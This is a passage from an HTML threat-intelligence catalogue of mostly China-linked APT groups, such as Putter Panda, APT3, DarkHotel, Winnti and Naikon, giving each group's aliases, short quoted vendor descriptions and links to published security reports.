</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf">https://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_predator_panda"><a class="anchor" href="#_predator_panda"></a><a class="link" href="#_predator_panda">Predator Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2373. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf">http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_union_panda"><a class="anchor" href="#_union_panda"></a><a class="link" href="#_union_panda">Union Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2374. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf">http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spicy_panda"><a class="anchor" href="#_spicy_panda"></a><a class="link" href="#_spicy_panda">Spicy Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2375. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf">http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_eloquent_panda"><a class="anchor" href="#_eloquent_panda"></a><a class="link" href="#_eloquent_panda">Eloquent Panda</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2376. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf">http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dizzy_panda"><a class="anchor" href="#_dizzy_panda"></a><a class="link" href="#_dizzy_panda">Dizzy Panda</a></h3>
<div class="paragraph">
<p>Dizzy Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>LadyBoyle</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_putter_panda_2"><a class="anchor" href="#_putter_panda_2"></a><a class="link" href="#_putter_panda_2">Putter Panda</a></h3>
<div class="paragraph">
<p>Putter Panda were the subject of an extensive report by CrowdStrike, which stated: 'The CrowdStrike Intelligence team has been tracking this particular unit since2012, under the codename PUTTER PANDA, and has documented activity dating back to 2007. The report identifies Chen Ping, aka cpyy, and the primary location of Unit 61486.'</p>
</div>
<div class="paragraph">
<p>Putter Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PLA Unit 61486</p>
</li>
<li>
<p>APT 2</p>
</li>
<li>
<p>Group 36</p>
</li>
<li>
<p>APT-2</p>
</li>
<li>
<p>MSUpdater</p>
</li>
<li>
<p>4HCrew</p>
</li>
<li>
<p>SULPHUR</p>
</li>
<li>
<p>TG-6952</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2377. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ups"><a class="anchor" href="#_ups"></a><a class="link" href="#_ups">UPS</a></h3>
<div class="paragraph">
<p>Symantec described UPS in 2016 report as: 'Buckeye (also known as APT3, Gothic Panda, UPS Team, and TG-0110) is a cyberespionage group that is believed to have been operating for well over half a decade. Traditionally, the group attacked organizations in the US as well as other targets. However, Buckeyes focus appears to have changed as of June 2015, when the group began compromising political entities in Hong Kong.'</p>
</div>
<div class="paragraph">
<p>UPS is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Gothic Panda</p>
</li>
<li>
<p>TG-0110</p>
</li>
<li>
<p>APT 3</p>
</li>
<li>
<p>Group 6</p>
</li>
<li>
<p>UPS Team</p>
</li>
<li>
<p>APT3</p>
</li>
<li>
<p>Buckeye</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2378. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html">https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong">http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darkhotel_2"><a class="anchor" href="#_darkhotel_2"></a><a class="link" href="#_darkhotel_2">DarkHotel</a></h3>
<div class="paragraph">
<p>Kaspersky described DarkHotel in a 2014 report as: '&#8230;&#8203; DarkHotel drives its campaigns by spear-phishing targets with highly advanced Flash zero-day exploits that effectively evade the latest Windows and Adobe defenses, and yet they also imprecisely spread among large numbers of vague targets with peer-to-peer spreading tactics. Moreover, this crews most unusual characteristic is that for several years the Darkhotel APT has maintained a capability to use hotel networks to follow and hit selected targets as they travel around the world.'</p>
</div>
<div class="paragraph">
<p>DarkHotel is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DUBNIUM</p>
</li>
<li>
<p>Fallout Team</p>
</li>
<li>
<p>Karba</p>
</li>
<li>
<p>Luder</p>
</li>
<li>
<p>Nemim</p>
</li>
<li>
<p>Tapaoux</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2379. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/">https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2">https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/66779/the-darkhotel-apt/">https://securelist.com/blog/research/66779/the-darkhotel-apt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://drops.wooyun.org/tips/11726">http://drops.wooyun.org/tips/11726</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/">https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ixeshe_2"><a class="anchor" href="#_ixeshe_2"></a><a class="link" href="#_ixeshe_2">IXESHE</a></h3>
<div class="paragraph">
<p>A group of China-based attackers, who conducted a number of spear phishing attacks in 2013.</p>
</div>
<div class="paragraph">
<p>IXESHE is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Numbered Panda</p>
</li>
<li>
<p>TG-2754</p>
</li>
<li>
<p>BeeBus</p>
</li>
<li>
<p>Group 22</p>
</li>
<li>
<p>DynCalc</p>
</li>
<li>
<p>Calc Team</p>
</li>
<li>
<p>DNSCalc</p>
</li>
<li>
<p>Crimson Iron</p>
</li>
<li>
<p>APT12</p>
</li>
<li>
<p>APT 12</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2380. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/whois-numbered-panda/">http://www.crowdstrike.com/blog/whois-numbered-panda/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt_16"><a class="anchor" href="#_apt_16"></a><a class="link" href="#_apt_16">APT 16</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2381. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html">https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aurora_panda"><a class="anchor" href="#_aurora_panda"></a><a class="link" href="#_aurora_panda">Aurora Panda</a></h3>
<div class="paragraph">
<p>FireEye described APT17 in a 2015 report as: 'APT17, also known as DeputyDog, is a China based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations.'</p>
</div>
<div class="paragraph">
<p>Aurora Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT 17</p>
</li>
<li>
<p>Deputy Dog</p>
</li>
<li>
<p>Group 8</p>
</li>
<li>
<p>APT17</p>
</li>
<li>
<p>Hidden Lynx</p>
</li>
<li>
<p>Tailgater Team</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2382. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html">http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/hidden_lynx.pdf">http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/hidden_lynx.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wekby"><a class="anchor" href="#_wekby"></a><a class="link" href="#_wekby">Wekby</a></h3>
<div class="paragraph">
<p>Wekby was described by Palo Alto Networks in a 2015 report as: 'Wekby is a group that has been active for a number of years, targeting various industries such as healthcare, telecommunications, aerospace, defense, and high tech. The group is known to leverage recently released exploits very shortly after those exploits are available, such as in the case of HackingTeams Flash zero - day exploit.'</p>
</div>
<div class="paragraph">
<p>Wekby is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dynamite Panda</p>
</li>
<li>
<p>TG-0416</p>
</li>
<li>
<p>APT 18</p>
</li>
<li>
<p>SCANDIUM</p>
</li>
<li>
<p>PLA Navy</p>
</li>
<li>
<p>APT18</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2383. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828">https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_tropic_trooper"><a class="anchor" href="#_tropic_trooper"></a><a class="link" href="#_tropic_trooper">Tropic Trooper</a></h3>
<div class="paragraph">
<p>TrendMicro described Tropic Trooper in a 2015 report as: 'Taiwan and the Philippines have become the targets of an ongoing campaign called Operation TropicTrooper. Active since 2012, the attackers behind the campaign haveset their sights on the Taiwanese government as well as a number of companies in the heavy industry. The same campaign has also targeted key Philippine military agencies.'</p>
</div>
<div class="paragraph">
<p>Tropic Trooper is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Operation Tropic Trooper</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2384. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/">http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-tropic-trooper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_axiom_2"><a class="anchor" href="#_axiom_2"></a><a class="link" href="#_axiom_2">Axiom</a></h3>
<div class="paragraph">
<p>The Winnti grouping of activity is large and may actually be a number of linked groups rather than a single discrete entity. Kaspersky describe Winnti as: 'The Winnti group has been attacking companies in the online video game industry since 2009 and is currently still active. The groups objectives are stealing digital certificates signed by legitimate software vendors in addition to intellectual property theft, including the source code of online game projects. The majority of the victims are from South East Asia.'</p>
</div>
<div class="paragraph">
<p>Axiom is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Winnti Group</p>
</li>
<li>
<p>Tailgater Team</p>
</li>
<li>
<p>Group 72</p>
</li>
<li>
<p>Group72</p>
</li>
<li>
<p>Tailgater</p>
</li>
<li>
<p>Ragebeast</p>
</li>
<li>
<p>Blackfly</p>
</li>
<li>
<p>Lead</p>
</li>
<li>
<p>Wicked Spider</p>
</li>
<li>
<p>APT17</p>
</li>
<li>
<p>APT 17</p>
</li>
<li>
<p>Dogfish</p>
</li>
<li>
<p>Deputy Dog</p>
</li>
<li>
<p>Wicked Panda</p>
</li>
<li>
<p>Barium</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2385. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://securelist.com/blog/research/57585/winnti-faq-more-than-just-a-game/">http://securelist.com/blog/research/57585/winnti-faq-more-than-just-a-game/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://williamshowalter.com/a-universal-windows-bootkit/">http://williamshowalter.com/a-universal-windows-bootkit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp">https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shell_crew"><a class="anchor" href="#_shell_crew"></a><a class="link" href="#_shell_crew">Shell Crew</a></h3>
<div class="paragraph">
<p>Adversary group targeting financial, technology, non-profit organisations.</p>
</div>
<div class="paragraph">
<p>Shell Crew is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Deep Panda</p>
</li>
<li>
<p>WebMasters</p>
</li>
<li>
<p>APT 19</p>
</li>
<li>
<p>KungFu Kittens</p>
</li>
<li>
<p>Black Vine</p>
</li>
<li>
<p>Group 13</p>
</li>
<li>
<p>PinkPanther</p>
</li>
<li>
<p>Sh3llCr3w</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2386. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cybercampaigns.net/wp-content/uploads/2013/06/Deep-Panda.pdf">http://cybercampaigns.net/wp-content/uploads/2013/06/Deep-Panda.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf">http://www.rsaconference.com/writable/presentations/file_upload/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries_final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_naikon_2"><a class="anchor" href="#_naikon_2"></a><a class="link" href="#_naikon_2">Naikon</a></h3>
<div class="paragraph">
<p>Kaspersky described Naikon in a 2015 report as: 'The Naikon group is mostly active in countries such as the Philippines, Malaysia, Cambodia, Indonesia, Vietnam, Myanmar, Singapore, and Nepal, hitting a variety of targets in a very opportunistic way.'</p>
</div>
<div class="paragraph">
<p>Naikon is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PLA Unit 78020</p>
</li>
<li>
<p>APT 30</p>
</li>
<li>
<p>APT30</p>
</li>
<li>
<p>Override Panda</p>
</li>
<li>
<p>Camerashy</p>
</li>
<li>
<p>APT.Naikon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2387. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/69953/the-naikon-apt/">https://securelist.com/analysis/publications/69953/the-naikon-apt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html">http://www.fireeye.com/blog/technical/malware-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lotus_blossom_2"><a class="anchor" href="#_lotus_blossom_2"></a><a class="link" href="#_lotus_blossom_2">Lotus Blossom</a></h3>
<div class="paragraph">
<p>Lotus Blossom is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Spring Dragon</p>
</li>
<li>
<p>ST Group</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2388. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/70726/the-spring-dragon-apt/">https://securelist.com/blog/research/70726/the-spring-dragon-apt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/spring-dragon-updated-activity/79067/">https://securelist.com/spring-dragon-updated-activity/79067/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lotus_panda"><a class="anchor" href="#_lotus_panda"></a><a class="link" href="#_lotus_panda">Lotus Panda</a></h3>
<div class="paragraph">
<p>Lotus Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Elise</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2389. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/">http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hurricane_panda"><a class="anchor" href="#_hurricane_panda"></a><a class="link" href="#_hurricane_panda">Hurricane Panda</a></h3>
<div class="paragraph">
<p>Hurricane Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Black Vine</p>
</li>
<li>
<p>TEMP.Avengers</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2390. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/">http://www.crowdstrike.com/blog/cyber-deterrence-in-action-a-story-of-one-long-hurricane-panda-campaign/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_emissary_panda"><a class="anchor" href="#_emissary_panda"></a><a class="link" href="#_emissary_panda">Emissary Panda</a></h3>
<div class="paragraph">
<p>A China-based actor that targets foreign embassies to collect data on government, defence, and technology sectors.</p>
</div>
<div class="paragraph">
<p>Emissary Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TG-3390</p>
</li>
<li>
<p>APT 27</p>
</li>
<li>
<p>TEMP.Hippo</p>
</li>
<li>
<p>Group 35</p>
</li>
<li>
<p>Bronze Union</p>
</li>
<li>
<p>ZipToken</p>
</li>
<li>
<p>HIPPOTeam</p>
</li>
<li>
<p>APT27</p>
</li>
<li>
<p>Operation Iron Tiger</p>
</li>
<li>
<p>Iron Tiger APT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2391. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/">http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/">http://www.scmagazineuk.com/iran-and-russia-blamed-for-state-sponsored-espionage/article/330401/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/">https://labs.bitdefender.com/2018/02/operation-pzchao-a-possible-return-of-the-iron-tiger-apt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/">https://labs.bitdefender.com/wp-content/uploads/downloads/operation-pzchao-inside-a-highly-specialized-espionage-infrastructure/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_stone_panda"><a class="anchor" href="#_stone_panda"></a><a class="link" href="#_stone_panda">Stone Panda</a></h3>
<div class="paragraph">
<p>Stone Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT10</p>
</li>
<li>
<p>APT 10</p>
</li>
<li>
<p>menuPass</p>
</li>
<li>
<p>happyyongzi</p>
</li>
<li>
<p>POTASSIUM</p>
</li>
<li>
<p>DustStorm</p>
</li>
<li>
<p>Red Apollo</p>
</li>
<li>
<p>CVNX</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2392. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/">http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nightshade_panda"><a class="anchor" href="#_nightshade_panda"></a><a class="link" href="#_nightshade_panda">Nightshade Panda</a></h3>
<div class="paragraph">
<p>Nightshade Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT 9</p>
</li>
<li>
<p>Flowerlady/Flowershow</p>
</li>
<li>
<p>Flowerlady</p>
</li>
<li>
<p>Flowershow</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2393. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://otx.alienvault.com/pulse/55bbc68e67db8c2d547ae393/">https://otx.alienvault.com/pulse/55bbc68e67db8c2d547ae393/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hellsing"><a class="anchor" href="#_hellsing"></a><a class="link" href="#_hellsing">Hellsing</a></h3>
<div class="paragraph">
<p>Hellsing is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Goblin Panda</p>
</li>
<li>
<p>Cycldek</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2394. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/">https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_night_dragon_2"><a class="anchor" href="#_night_dragon_2"></a><a class="link" href="#_night_dragon_2">Night Dragon</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2395. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kc.mcafee.com/corporate/index?page=content&amp;id=KB71150">https://kc.mcafee.com/corporate/index?page=content&amp;id=KB71150</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
